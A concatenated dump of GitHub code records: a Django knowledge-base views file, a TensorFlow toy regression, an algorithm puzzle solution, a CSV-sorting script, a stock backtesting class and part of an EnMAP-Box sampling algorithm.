total_ne_count,\n 'infoboxtuple_count': total_tuple_count,\n 'verb_count': total_verb_count,\n 'db_version': DBVersion\n }\n }\n\ndef populate_random_suggestion():\n # fetch random named entities\n random_nes = []\n\n for randomed in random_objects(NamedEntity, 6):\n random_nes.append({\n 'ne_title': randomed.name,\n 'ne_url': reverse('ShowTuplesForNamedEntity', args=(randomed.pk,))\n })\n\n return {\n 'randomnes': random_nes\n }\n\nstopwords = None\ndef is_in_stopwords(word):\n global stopwords\n if stopwords is None:\n _stopwords = {}\n with open(os.path.dirname(__file__)+'/stopwords.txt') as f:\n for line in f:\n _stopwords[line.rstrip('\\n').decode('utf8')] = 1\n stopwords = _stopwords\n\n return word in stopwords\n\n# init stopwords cache\nis_in_stopwords('')\n\nsynonym = None\ndef get_synonyms(word):\n global synonym\n if synonym is None:\n _synonym = {}\n with open(os.path.dirname(__file__)+'/synonym.txt') as f:\n for line in f:\n f = line.rstrip('\\n').decode('utf8')\n if f[0] == '#': continue\n if len(f) <= 9: continue\n f = f[9:]\n words = [x.strip() for x in re.split(r'\\s+', f) if x.strip()]\n for word in words:\n _synonym[word] = [x for x in words if x!=word]\n synonym = _synonym\n\n return synonym.get(word, [])\n\n# init synonym cache\nget_synonyms('')\n\n# views starts\n\ndef About(request):\n return render(request, 'bdbk/About.html', {})\n\ndef Status_Overview(request):\n return render(request, 'bdbk/Status_Overview.html', populate_db_status())\n\ndef Status_Verb(request):\n return HttpResponse('TODO')\n\ndef Status_NamedEntity(request, filter_string=None):\n return HttpResponse('TODO')\n\ndef AdvancedSearch(request):\n def AdvancedSearch_get(request):\n context = {}\n context.update(populate_random_suggestion())\n context.update(populate_db_status())\n return render(request, 'bdbk/AdvancedSearch_form.html', context)\n\n def AdvancedSearch_post(request):\n ne_action = request.POST.get('limitNE_action')\n ne_str = request.POST.get('limitNE_str')\n\n verb_action = request.POST.get('limitVERB_action')\n verb_str = request.POST.get('limitVERB_str')\n\n content_action = request.POST.get('limitCONTENT_action')\n content_str = request.POST.get('limitCONTENT_str')\n\n def action_to_query_dict(field, field_friendly_name, action, qstr):\n if action == 'IS':\n a = 'iexact'\n b = '%s is \"%s\"' % (field_friendly_name, qstr)\n elif action == 'STARTSWITH':\n a = 'istartswith'\n b = '%s starts with \"%s\"' % (field_friendly_name, qstr)\n elif action == 'ENDSWITH':\n a = 'iendswith'\n b = '%s ends with \"%s\"' % (field_friendly_name, qstr)\n elif action == 'CONTAINS':\n a = 'icontains'\n b = '%s contains \"%s\"' % (field_friendly_name, qstr)\n else:\n a = 'icontains'\n b = '%s contains \"%s\"' % (field_friendly_name, qstr)\n\n return b, {\n field + '__' + a: qstr\n }\n\n qdict = []\n friendly_name = []\n if ne_str:\n friendly_name_1, qdict_1 = action_to_query_dict('named_entity__name', 'Name of entity', ne_action, ne_str)\n q = Q(**qdict_1)\n friendly_name.append(friendly_name_1)\n\n friendly_name_1, qdict_1 = action_to_query_dict('named_entity__search_term', 'Search term of entity', ne_action, ne_str)\n q |= Q(**qdict_1)\n friendly_name.append(friendly_name_1)\n\n friendly_name_alias, qdict_alias = action_to_query_dict('link_from', 'Name alias', ne_action, ne_str)\n friendly_name.append(friendly_name_alias)\n alias_result = NamedEntityAlias.objects.filter(**qdict_alias).all()\n if alias_result:\n q |= Q(named_entity__pk__in=[x.link_to.pk for x in alias_result])\n\n qdict.append(q)\n if verb_str:\n friendly_name_2, qdict_2 = action_to_query_dict('verb__name', 'verb', verb_action, verb_str)\n qdict.append(Q(**qdict_2))\n friendly_name.append(friendly_name_2)\n if content_str:\n friendly_name_3, qdict_3 = action_to_query_dict('content', 'attribute value', content_action, content_str)\n qdict.append(Q(**qdict_3))\n friendly_name.append(friendly_name_3)\n\n if not qdict:\n context = {\n 'search_result_message': 'No filter applied.'\n }\n else:\n # TODO: paginator\n qresult = InfoboxTuple.objects.filter(*qdict).order_by('named_entity', 'verb')\n\n result = []\n for i in qresult:\n result.append({\n 'namedentity': i.named_entity.name,\n 'namedentity_url': reverse('ShowTuplesForNamedEntity', args=(i.named_entity.id,)),\n 'verb': i.verb.name,\n 'content': resolve_content_links(i.content, list(i.infoboxtuplelink_set.all()))\n })\n\n context = {\n 'search_result': result,\n 'friendly_query_string': ', '.join(friendly_name),\n 'search_result_message': '%d results.' % len(result)\n }\n\n context.update(populate_db_status())\n return render(request, 'bdbk/AdvancedSearch_result.html', context)\n\n if request.method == 'POST':\n return AdvancedSearch_post(request)\n else:\n return AdvancedSearch_get(request)\n\n@require_http_methods(['POST'])\ndef FuzzySearch(request):\n '''\n Fuzzy query strategy:\n 1. Named Entity name:\n name,\n search_term\n 2. Content:\n 3. Verb\n '''\n\n search_term = request.POST.get('query', None)\n if not search_term:\n return HttpResponseRedirect(reverse('ShowTuplesForNamedEntity', args=('random',)))\n\n # ne_search_result = NamedEntity.objects.filter(name__startswith=search_term)\n ne_search_result = NamedEntity.objects.filter(name__icontains=search_term)\n\n search_result_ne = []\n for obj in ne_search_result:\n search_result_ne.append({\n 'ne_name': obj.name,\n 'ne_url': reverse('ShowTuplesForNamedEntity', args=(obj.pk,))\n })\n\n tuple_search_result = InfoboxTuple.objects.filter(content__icontains=search_term)\n\n search_result_content = []\n for obj in tuple_search_result:\n search_result_content.append({\n 'ne_name': obj.named_entity.name,\n 'ne_url': reverse('ShowTuplesForNamedEntity', args=(obj.named_entity.pk,)),\n 'verb': obj.verb.name,\n 'content': resolve_content_links(obj.content, list(obj.infoboxtuplelink_set.all())),\n })\n\n result = {\n 'search_term': search_term,\n 'search_result_ne': search_result_ne,\n 'search_result_content': search_result_content,\n }\n return render(request, 'bdbk/SearchResult.html', result)\n\ndef ShowTuplesForNamedEntity(request, nepk):\n if nepk == 'random':\n random_ne = list(random_objects(NamedEntity, 1))[0]\n nepk = random_ne.pk\n return HttpResponseRedirect(reverse('ShowTuplesForNamedEntity', args=(nepk,)))\n\n nepk = int(nepk)\n\n ne_object = get_object_or_404(NamedEntity, pk=nepk)\n\n tuples = []\n\n for infoboxtuple in ne_object.infoboxtuple_set.all():\n tuples.append({\n 'verb': infoboxtuple.verb.name,\n 'content': resolve_content_links(infoboxtuple.content, list(infoboxtuple.infoboxtuplelink_set.all())),\n })\n\n def getCatString(ne_object):\n cat_names = []\n for i in ne_object.categories.all():\n cat_names.append(i.name)\n\n return ','.join(cat_names)\n\n result = {\n 'nepk': nepk,\n 'namedentity':{\n 'ne_id': nepk,\n 'ne_title': ne_object.name,\n 'ne_search_term': ne_object.search_term,\n 'ne_last_modified': ne_object.last_modified.strftime('%Y-%m-%d %H:%M:%S') if ne_object.last_modified else 'Not Specified',\n 'ne_bdbk_url': ne_object.bdbk_url,\n 'ne_infobox': tuples,\n 'ne_cats': getCatString(ne_object),\n },\n }\n result.update(populate_random_suggestion())\n result.update(populate_db_status())\n\n return render(request, 'bdbk/ShowTuplesForNamedEntity.html', result)\n\ndef namedEntityLinks(request, nepk):\n '''\n return value:\n {\n \"name\": \"name of ne\",\n\n \"tuples\": [{\n \"id\": 0,\n \"verb\": \"some verb\",\n \"value\": \"some value\",\n }, ...],\n\n \"links\": [{\n \"id\": 0,\n \"name\": \"some link name\",\n \"nepk\": some pk\n \"tuple\": 0\n }]\n }\n '''\n ne_object = get_object_or_404(NamedEntity, pk=nepk)\n result = {}\n result['name'] = ne_object.name\n\n nodes = {}\n links = []\n def linkedNEOfNE(obj, obj_group):\n if obj.pk not in nodes:\n nodes[obj.pk] = {\n \"name\": obj.name,\n \"nepk\": obj.pk,\n \"group\": obj_group,\n \"ne_obj\": obj\n }\n for tuple in obj.infoboxtuple_set.all():\n def handle_links(match):\n schema = match.group(1)\n link = match.group(2)\n if schema == 'link':\n real_url = 'http://baike.baidu.com' + link\n\n # we are currently unable to resolve duplicate bdbk_urls, so...\n ne = NamedEntity.objects.exclude(pk=obj.pk).filter(bdbk_url=real_url)\n if len(ne) > 0:\n ne = ne[0]\n if ne.pk not in nodes:\n nodes[ne.pk] = {\n \"name\": ne.name,\n \"nepk\": ne.pk,\n \"group\": obj_group+1,\n \"ne_obj\": ne\n }\n\n links.append({\n \"source\": obj.pk,\n \"target\": ne.pk\n })\n else:\n pass\n\n return match.group(3)\n\n re.sub(r'\\{\\{([a-zA-Z_]+):([^|]+)\\|(.*?)\\}\\}', handle_links, tuple.content)\n\n for link in tuple.infoboxtuplelink_set.all():\n match = re.match(r'\\{\\{([a-zA-Z_]+):(\\d+)\\}\\}', link.linkcontent)\n if not match:\n continue\n\n schema = match.group(1)\n mid = match.group(2)\n ne_obj = None\n\n if schema == 'alias_id':\n try:\n alias = NamedEntityAlias.objects.get(pk=mid)\n ne_obj = alias.link_to\n except ObjectDoesNotExist as e:\n pass\n elif schema == 'ne_id':\n try:\n ne_obj = NamedEntity.objects.get(pk=mid)\n except ObjectDoesNotExist as e:\n pass\n\n if ne_obj:\n if ne_obj.pk not in nodes:\n nodes[ne_obj.pk] = {\n \"name\": ne_obj.name,\n \"nepk\": ne_obj.pk,\n \"group\": obj_group+1,\n \"ne_obj\": ne_obj\n }\n links.append({\n \"source\": obj.pk,\n \"target\": ne_obj.pk,\n })\n\n\n linkedNEOfNE(ne_object, 5)\n for i in nodes.values():\n if i['ne_obj'].pk != ne_object.pk:\n linkedNEOfNE(i['ne_obj'], 6)\n\n # relink all nodes\n new_nodes = []\n new_links = []\n new_neid_nodeid_map = {}\n\n def addNode(pk):\n if pk not in new_neid_nodeid_map:\n node = nodes[pk]\n new_nodes.append({\n 'name': node['name'],\n 'ne_pk': node['nepk'],\n 'group': node['group'],\n })\n new_neid_nodeid_map[pk] = len(new_nodes) - 1\n return new_neid_nodeid_map[pk]\n\n addNode(ne_object.pk)\n\n for link in links:\n source = addNode(link['source'])\n target = addNode(link['target'])\n new_links.append({\n 'source': source,\n 'target': target\n })\n result['nodes'] = new_nodes\n result['links'] = new_links\n\n return HttpResponse(json.dumps(result), content_type='text/json')\n\ndef qaQueryAPI(request):\n text = request.POST.get('text', None)\n\n if text is None:\n return HttpResponseBadRequest()\n\n words = list(jieba.cut(text, cut_all=False))\n\n ne_result = []\n\n def search_ne():\n for i in range(len(words)):\n for j in range(i+1, len(words)+1):\n s = ''.join(words[i:j])\n if is_in_stopwords(s):\n continue\n\n for o in NamedEntity.objects.filter(name__iexact=s):\n ne_result.append({\n 'pos': (i,j),\n 'type': 'ne',\n 'display': o.name,\n 'o': o\n })\n for o in NamedEntity.objects.filter(~Q(name__iexact=s),\n Q(search_term__iexact=s)):\n ne_result.append({\n 'pos': (i,j),\n 'type': 'ne_search_term',\n 'display': o.search_term,\n 'o': o\n })\n for o in NamedEntityAlias.objects.filter(link_from__iexact=s):\n ne_result.append({\n 'pos': (i,j),\n 'type': 'alias',\n 'display': o.link_from,\n 'o': o\n })\n\n verb_result = []\n def search_verb():\n for i in range(len(words)):\n for j in range(i+1, len(words)+1):\n s = ''.join(words[i:j])\n try:\n o = Verb.objects.get(name__iexact=s)\n verb_result.append({\n 'pos': (i,j),\n 'display': o.name,\n 'o': o\n })\n except ObjectDoesNotExist as e:\n pass\n\n search_ne()\n search_verb()\n\n result = {\n 'tokenize': words,\n 'result': []\n }\n\n named_entities = []\n for i in ne_result:\n if i['type'] == 'alias':\n if i['o'].link_to.infoboxtuple_set.count() > 0:\n named_entities.append({\n 'ne_title': i['o'].link_to.name,\n 'ne_display': i['display'],\n 'is_alias': True,\n 'ne_id': i['o'].link_to.pk\n })\n else:\n if i['o'].infoboxtuple_set.count() > 0:\n named_entities.append({\n 'ne_title': i['o'].name,\n 'ne_display': i['display'],\n 'ne_id': i['o'].pk,\n 'is_alias': False\n })\n result['named_entities'] = sorted(named_entities,\n key=lambda x:len(x['ne_display']),\n reverse=True)\n\n for i in ne_result:\n for j in verb_result:\n if i['pos'][1] > j['pos'][0]:\n continue\n\n ne_obj = i['o'] if i['type'] != 'alias' else i['o'].link_to\n verb_obj = j['o']\n\n infobox = InfoboxTuple.objects.filter(named_entity=ne_obj.pk,\n verb=verb_obj.pk)\n if len(infobox):\n result['result'].append({\n 'ne_title': ne_obj.name,\n 'ne_display': i['display'],\n 'is_alias': i['type'] == 'alias',\n 'verb': verb_obj.name,\n 'ne_id': ne_obj.pk,\n 'content': resolve_content_links(infobox[0].content)\n })\n\n if not result['result']:\n def edit_distance(s1, s2):\n m=len(s1)+1\n n=len(s2)+1\n\n tbl = {}\n for i in range(m): tbl[i,0]=i\n for j in range(n): tbl[0,j]=j\n for i in range(1, m):\n for j in range(1, n):\n cost = 0 if s1[i-1] == s2[j-1] else 1\n tbl[i,j] = min(tbl[i, j-1]+1, tbl[i-1, j]+1, tbl[i-1, j-1]+cost)\n\n return tbl[i,j]\n\n # find infobox by applying edit distance\n for i in ne_result:\n remaining = ''.join(words[i['pos'][1]:])\n ne_obj = i['o'] if i['type'] != 'alias' else i['o'].link_to\n matched = []\n for j in ne_obj.infoboxtuple_set.all():\n verb = j.verb.name\n\n # synonyms\n should_continue = False\n for word in get_synonyms(verb):\n if word in remaining:\n matched.append((len(word), j))\n should_continue = True\n if should_continue: continue\n\n common_chr = set(remaining) & set(verb)\n if not common_chr:\n continue\n\n matched.append((len(common_chr), j))\n\n matched = sorted(matched, key=lambda x:x[0], reverse=True)\n if matched:\n result['result'].append({\n 'ne_title': ne_obj.name,\n 'ne_display': i['display'],\n 'is_alias': i['type'] == 'alias',\n 'verb': matched[0][1].verb.name,\n 'ne_id': ne_obj.pk,\n 'content': resolve_content_links(matched[0][1].content)\n })\n\n result['result'] = sorted(result['result'],\n key=lambda x:len(x['ne_display']),\n reverse=True)\n\n return HttpResponse(json.dumps(result), content_type='text/json')\n\ndef QA(request):\n return render(request, 'bdbk/QA.html', {})\n","repo_name":"NLPScott/bdbk-kb","sub_path":"project/bdbk/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":23122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37608089759","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\n\nx = tf.constant([[1],[2],[3],[4]], dtype = tf.float32)\nyTrue = tf.constant([[0],[-2],[-1],[-3]] , dtype =tf.float32)\n\nlinearModel = tf.layers.Dense(units= 1)\n\nyPred = linearModel(x)\n\nsess = tf.Session()\ninit = tf.global_variables_initializer()\nsess.run(init)\n\nprint(sess.run(yPred))\n\nloss = tf.losses.mean_squared_error(labels = yTrue , predictions = yPred)\n\nprint(sess.run(loss))\n\noprimizer = tf.train.GradientDescentOptimizer(0.01)\ntrain = oprimizer.minimize(loss)\n\nfor i in range(100):\n\t_,lossValue = sess.run((train,loss))\n\tprint(lossValue)","repo_name":"kasunvj/Tensorflow_core_gym-","sub_path":"TFcore2.py","file_name":"TFcore2.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70212869925","text":"import sys\r\n\r\n\r\ndef main():\r\n N = int(input())\r\n count = [0, 1, 1]\r\n while len(count) - 1 < N:\r\n count.append(count[-2] + count[-1])\r\n print(count[N])\r\n\r\n\r\nif __name__ == '__main__':\r\n input = sys.stdin.readline\r\n main()\r\n","repo_name":"SeungWoo-You/PS","sub_path":"백준/Silver/2193. 이친수/이친수.py","file_name":"이친수.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27057465727","text":"import csv\nfrom itertools import islice\nfrom operator import itemgetter\nimport pprint\n\nNew = {}\n\n\ndef select_sorted(sort_columns='high', order='asc', limit=10, filename='dump.csv', group_by_name=False):\n high_lst = []\n with open('all_stocks_5yr.csv', 'r', encoding='utf8') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=',')\n group_by_name = []\n for row in reader:## Sozdali spisok is 10 elementov\n if len(high_lst) < limit:\n high_lst.append(row[sort_columns])\n group_by_name.append(row['Name'])\n else:\n break\n high_lst = [float(x) for x in high_lst]## pereveli iz str fo float\n group_by_name.sort()##Tut ispolsuu sort nechestno\n\n if not group_by_name:###Zdes ya ne ponimau kak rabotaet True False i chto nado sdelat\n with open('output.csv', \"w\") as f:\n writer = csv.writer(f)\n writer.writerow(group_by_name)\n else:\n\n for i in range(len(high_lst) - 1): ##Sortiruem puzrkom\n index_1 = 0\n for j in range(len(high_lst) - index_1 - 1):\n if high_lst[index_1] > high_lst[index_1 + 1]:\n high_lst[index_1], high_lst[index_1 + 1] = high_lst[index_1 + 1], high_lst[index_1]\n index_1 += 1\n elif high_lst[index_1] < high_lst[index_1 + 1]:\n index_1 += 1\n\n # with open('output.csv', \"w\") as f:\n # writer = csv.writer(f)\n # writer.writerow(group_by_name)\n\n if order == 'asc': ##Zanosim v cvs file po vozrastaniu\n with open('output.csv', \"w\") as f:\n writer = csv.writer(f)\n writer.writerow(high_lst)\n\n else:## ##Zanosim v cvs file po ubivaniu\n high_lst_revers = reversed(high_lst)\n with open('output.csv', \"w\") as f:\n writer = csv.writer(f)\n writer.writerow(list(high_lst_revers))\n\n\n get_columns = itemgetter('date','open','high','low','close','volume','Name')\n Cache = {}\n\n with open('all_stocks_5yr.csv') as csvfile:\n reader = csv.DictReader(csvfile)\n index_1 = 0\n high_lst = [str(x) for x in high_lst]\n for row in islice(reader, limit): # first 10 put into Cache\n Cache[high_lst[index_1]] = get_columns(row)##V kachestve kluchei znachenia high iz high_lst\n index_1 += 1\n print(Cache, end='\\n')\n # return Cache, print(high_lst)\n # new = {}\n\n ## Obrashaemsya k elementu kortezha v slovare Cache: Cache[index_1]['high'] esli sovpal, to kortezh celicom stavim na 1 mesto\n new = {}\n index_1 = 0\n index_2 = 0\n for k in Cache:\n for v in Cache:\n if k == Cache[v][2]:\n new.update({k: Cache[v]})\n index_1 += 1\n elif k != Cache[v][2]:\n index_1 += 1\n index_2 += 1\n # print(new)\n pprint.pprint(new, width=100)\n\n\nselect_sorted(sort_columns='high', limit=10, order='desc', filename='dump.csv', group_by_name=True)\n\n# Cache, high_lst =\n# def f(Cache):\n#\n# print(Cache)\n#\n#\n# f(Cache)\n\n# def cache_new(func):\n# def wrapper(*args):\n# global New\n# if args[0] in New:\n# return New[0]\n# value = func(*args)\n# New[args[0]] = value\n# return value\n# return wrapper\n#\n#\n# @cache_new","repo_name":"Andreymazo/select_sorted","sub_path":"sorted.py","file_name":"sorted.py","file_ext":"py","file_size_in_byte":3584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20166221215","text":"import pandas as pd\nimport numpy as np\nimport datetime as dt\nfrom typing import Iterable, Tuple\n\n\nclass Backtesting:\n def __init__(\n self,\n initial_cash_balance: int,\n end_date: dt,\n compiled_df: pd.DataFrame,\n ten_yr_yield: pd.Series,\n stock_to_beta_df: pd.DataFrame,\n index_prices: pd.Series\n ):\n self.cash_balance = initial_cash_balance\n self.end_date = end_date\n self.bom_balance = initial_cash_balance\n self.ten_yr_yield = ten_yr_yield\n self.compiled_df = compiled_df\n self.stock_to_beta_df = stock_to_beta_df\n self.index_prices= index_prices\n self.is_sufficient_balance = True\n self.owned_stocks = []\n self.transaction_id = 1\n self.ticker_to_num_shares_monthly = dict()\n self.ticker_to_purchase_date = dict()\n self.ticker_to_purchase_price = dict()\n self.reached_holding_period_limit = []\n\n def get_closing_price(self, tr_date: dt, ticker: str) -> float:\n df = self.compiled_df.set_index(\"date\")\n return df.loc[tr_date][f\"closing_price_{ticker}\"]\n\n def get_rsi(self, tr_date: dt, ticker: str) -> float:\n df = self.compiled_df.set_index(\"date\")\n return df.loc[tr_date][f\"rsi_{ticker}\"]\n\n def order_tickers_to_buy(self, tickers_to_buy: Iterable, tr_date: dt, order_by: str = None) -> Iterable:\n if order_by is None:\n return tickers_to_buy\n else:\n ticker_to_ordered_attribute = {\"ticker\": [], order_by: []}\n for ticker in tickers_to_buy:\n ticker_to_ordered_attribute[\"ticker\"] += [ticker]\n ticker_to_ordered_attribute[order_by] += [getattr(self, f\"get_{order_by}\")(tr_date, ticker)]\n\n ticker_to_ordered_attribute = pd.DataFrame(ticker_to_ordered_attribute).sort_values(by=order_by, ascending=False)\n\n return list(ticker_to_ordered_attribute[\"ticker\"])\n\n def initialise_output_dfs(self, is_buy_df: pd.DataFrame) -> Tuple[pd.DataFrame, pd.DataFrame]:\n start_date = is_buy_df[\"date\"][0]\n\n transactions_df = pd.DataFrame(\n {\n \"transaction_id\": 0,\n \"date\": start_date,\n \"stock\": None,\n \"action\": 0,\n \"price\": 0,\n \"num_shares\": 0,\n \"cash_balance\": self.cash_balance\n },\n index=[0]\n )\n\n capm_df = pd.DataFrame(\n {\n \"sell_transaction_id\": 0,\n \"stock\": None,\n \"buy_date\": None,\n \"buy_price\": 0,\n \"sell_date\": None,\n \"sell_price\": 0,\n \"r_m\": 0,\n \"r_f\": 0,\n \"E_r\": 0,\n \"R_i\": 0,\n \"risk_adjusted_ri\": 0,\n \"reached_holding_period_limit\": False\n },\n index=[0]\n )\n\n return transactions_df, capm_df\n\n def get_tickers_to_buy(self, is_buy: pd.Series) -> Iterable:\n tickers_to_buy = set(s[7:] for s in is_buy[is_buy == True].index)\n tickers_to_buy = tickers_to_buy.difference(self.owned_stocks)\n\n return tickers_to_buy\n\n def get_tickers_to_sell(self, is_sell: pd.Series, tr_date: dt, max_days_held: int = None) -> Iterable:\n tickers_to_sell = set(s[8:] for s in is_sell[is_sell == True].index)\n tickers_to_sell = list(tickers_to_sell.intersection(self.owned_stocks))\n\n if max_days_held is not None:\n for ticker in self.owned_stocks:\n if ticker not in tickers_to_sell:\n days_held = (tr_date - self.ticker_to_purchase_date[ticker]).days\n if days_held > max_days_held:\n tickers_to_sell += [ticker]\n self.reached_holding_period_limit += [ticker]\n\n return tickers_to_sell\n \n def implement_trading_strategy(\n self, is_buy_df: pd.DataFrame, is_sell_df: pd.DataFrame, order_buy_trades_by: str, max_days_held: int = None\n ) -> Tuple[pd.DataFrame, pd.DataFrame]:\n\n transactions_df, capm_df = self.initialise_output_dfs(is_buy_df)\n\n for row in range(len(is_buy_df)):\n is_buy = is_buy_df.iloc[row]\n is_sell = is_sell_df.iloc[row]\n tr_date = is_buy[\"date\"]\n is_eom = self.compiled_df.set_index(\"date\").loc[tr_date][\"is_eom\"]\n investment_amount = np.round(self.bom_balance / 20, 2)\n\n if tr_date.date() == self.end_date:\n tickers_to_buy = []\n tickers_to_sell = self.owned_stocks.copy()\n else:\n tickers_to_buy = self.get_tickers_to_buy(is_buy)\n tickers_to_buy = self.order_tickers_to_buy(tickers_to_buy, tr_date, order_buy_trades_by)\n tickers_to_sell = self.get_tickers_to_sell(is_sell, tr_date, max_days_held)\n\n sell_index = 0\n while (len(tickers_to_sell) > 0) and (sell_index < len(tickers_to_sell)):\n ticker = tickers_to_sell[sell_index]\n buy_date = self.ticker_to_purchase_date[ticker]\n buy_price = self.ticker_to_purchase_price[ticker]\n days_held = (tr_date - buy_date).days\n action = -1\n price = self.get_closing_price(tr_date, ticker)\n num_shares = self.ticker_to_num_shares_monthly[ticker]\n self.cash_balance += num_shares * price\n transactions_df.loc[self.transaction_id, :] = [self.transaction_id, tr_date, ticker, action, price, num_shares, self.cash_balance]\n\n beta = self.stock_to_beta_df.loc[ticker][\"beta\"]\n rm = np.log(self.index_prices.loc[tr_date] / self.index_prices.loc[buy_date])\n rf = self.ten_yr_yield.loc[buy_date: tr_date].mean() / (365) * days_held\n er = rf + beta * (rm - rf)\n ri = np.log(price / buy_price)\n risk_adjusted_ri = ri - er\n if ticker in self.reached_holding_period_limit:\n bool_reached_hpl = True\n else:\n bool_reached_hpl = False\n\n capm_df.loc[self.transaction_id, :] = np.array(\n [self.transaction_id, ticker, buy_date.date(), buy_price, tr_date.date(), price, rm, rf, er, ri, risk_adjusted_ri, bool_reached_hpl],\n dtype=object)\n\n self.ticker_to_num_shares_monthly[ticker] = 0\n self.owned_stocks.remove(ticker)\n self.transaction_id += 1\n\n sell_index += 1\n\n if self.cash_balance > investment_amount:\n self.is_sufficient_balance = True\n\n buy_index = 0\n while (len(tickers_to_buy) > 0) and self.is_sufficient_balance and buy_index < len(tickers_to_buy):\n ticker = tickers_to_buy[buy_index]\n if self.cash_balance < investment_amount:\n self.is_sufficient_balance = False\n else:\n action = 1\n self.cash_balance -= investment_amount\n price = self.get_closing_price(tr_date, ticker)\n num_shares = np.round(investment_amount / price, 2)\n transactions_df.loc[self.transaction_id, :] = [self.transaction_id, tr_date, ticker, action, price, num_shares, self.cash_balance]\n self.ticker_to_num_shares_monthly[ticker] = num_shares\n self.ticker_to_purchase_date[ticker] = tr_date\n self.ticker_to_purchase_price[ticker] = price\n self.owned_stocks += [ticker]\n buy_index += 1\n self.transaction_id += 1\n\n if is_eom:\n self.bom_balance = self.cash_balance\n\n if self.bom_balance <= 0:\n break\n\n return transactions_df.set_index(\"transaction_id\"), capm_df.set_index(\"sell_transaction_id\")\n","repo_name":"musubr/stock-price-forecasts","sub_path":"src/backtesting.py","file_name":"backtesting.py","file_ext":"py","file_size_in_byte":8053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37880379536","text":"from typing import Dict, Any, List, Tuple, Union\r\n\r\nimport numpy as np\r\n\r\nfrom enmapboxprocessing.enmapalgorithm import EnMAPProcessingAlgorithm, Group\r\nfrom enmapboxprocessing.typing import ClassifierDump\r\nfrom enmapboxprocessing.utils import Utils\r\nfrom qgis.core import (QgsProcessingContext, QgsProcessingFeedback, QgsProcessingException)\r\nfrom enmapbox.typeguard import typechecked\r\n\r\n\r\n@typechecked\r\nclass RandomSamplesFromClassificationDatasetAlgorithm(EnMAPProcessingAlgorithm):\r\n P_DATASET, _DATASET = 'dataset', 'Classification dataset'\r\n P_N, _N = 'n', 'Number of samples per category'\r\n P_REPLACE, _REPLACE = 'replace', 'Draw with replacement'\r\n P_PROPORTIONAL, _PROPORTIONAL = 'proportional', 'Draw proportional'\r\n P_SEED, _SEED = 'seed', 'Random seed'\r\n P_OUTPUT_DATASET, _OUTPUT_DATASET = 'outputDatasetRandomSample', 'Output dataset'\r\n P_OUTPUT_COMPLEMENT, _OUTPUT_COMPLEMENT = 'outputDatasetRandomSampleComplement', 'Output dataset complement'\r\n\r\n def displayName(self) -> str:\r\n return 'Random samples from classification dataset'\r\n\r\n def shortDescription(self) -> str:\r\n return 'Split a dataset by randomly drawing samples.'\r\n\r\n def helpParameters(self) -> List[Tuple[str, str]]:\r\n return [\r\n (self._DATASET, 'Classification dataset pickle file with feature data X and target data y to draw from.'),\r\n (self._N,\r\n 'Number of samples to draw from each category. '\r\n 'Set a single value N to draw N samples for each category. '\r\n 'Set a list of values N1, N2, ... Ni, ... to draw Ni samples for category i.'),\r\n (self._REPLACE, 'Whether to draw samples with replacement.'),\r\n (self._PROPORTIONAL,\r\n 'Whether to interprete number of samples N or Ni as percentage to be drawn from each category.'),\r\n (self._SEED, 'The seed for the random generator can be provided.'),\r\n (self._OUTPUT_DATASET, self.PickleFileDestination + 'Stores sampled data.'),\r\n (self._OUTPUT_COMPLEMENT, self.PickleFileDestination + 'Stores remaining data that was not sampled.')\r\n ]\r\n\r\n def group(self):\r\n return Group.DatasetCreation.value\r\n\r\n def initAlgorithm(self, configuration: Dict[str, Any] = None):\r\n self.addParameterClassificationDataset(self.P_DATASET, self._DATASET)\r\n self.addParameterString(self.P_N, self._N)\r\n self.addParameterBoolean(self.P_REPLACE, self._REPLACE, False, advanced=True)\r\n self.addParameterBoolean(self.P_PROPORTIONAL, self._PROPORTIONAL, False, advanced=True)\r\n self.addParameterInt(self.P_SEED, self._SEED, None, True, 1, advanced=True)\r\n self.addParameterFileDestination(self.P_OUTPUT_DATASET, self._OUTPUT_DATASET, self.PickleFileFilter)\r\n self.addParameterFileDestination(\r\n self.P_OUTPUT_COMPLEMENT, self._OUTPUT_COMPLEMENT, self.PickleFileFilter, None, True, False\r\n )\r\n\r\n def processAlgorithm(\r\n self, parameters: Dict[str, Any], context: QgsProcessingContext, feedback: QgsProcessingFeedback\r\n ) -> Dict[str, Any]:\r\n filenameSample = self.parameterAsFile(parameters, self.P_DATASET, context)\r\n N = self.parameterAsValues(parameters, self.P_N, context)\r\n replace = self.parameterAsBoolean(parameters, self.P_REPLACE, context)\r\n proportional = self.parameterAsBoolean(parameters, self.P_PROPORTIONAL, context)\r\n seed = self.parameterAsInt(parameters, self.P_SEED, context)\r\n filename = self.parameterAsFileOutput(parameters, self.P_OUTPUT_DATASET, context)\r\n filename2 = self.parameterAsFileOutput(parameters, self.P_OUTPUT_COMPLEMENT, context)\r\n\r\n with open(filename + '.log', 'w') as logfile:\r\n feedback, feedback2 = self.createLoggingFeedback(feedback, logfile)\r\n self.tic(feedback, parameters, context)\r\n\r\n dump = ClassifierDump(**Utils.pickleLoad(filenameSample))\r\n feedback.pushInfo(\r\n f'Load dataset: X=array{list(np.shape(dump.X))} y=array{list(np.shape(dump.y))} categories={[c.name for c in dump.categories]}')\r\n\r\n # draw samples\r\n if seed is not None:\r\n np.random.seed(seed)\r\n\r\n indices, indices2 = self.drawSamples(N, dump, proportional, replace, feedback)\r\n\r\n # store sample\r\n dump2 = ClassifierDump(dump.categories, dump.features, dump.X[indices], dump.y[indices], None)\r\n Utils.pickleDump(dump2.__dict__, filename)\r\n\r\n # store conmplement\r\n if filename2 is not None:\r\n dump2 = ClassifierDump(dump.categories, dump.features, dump.X[indices2], dump.y[indices2], None)\r\n Utils.pickleDump(dump2.__dict__, filename2)\r\n\r\n result = {self.P_OUTPUT_DATASET: filename, self.P_OUTPUT_COMPLEMENT: filename2}\r\n 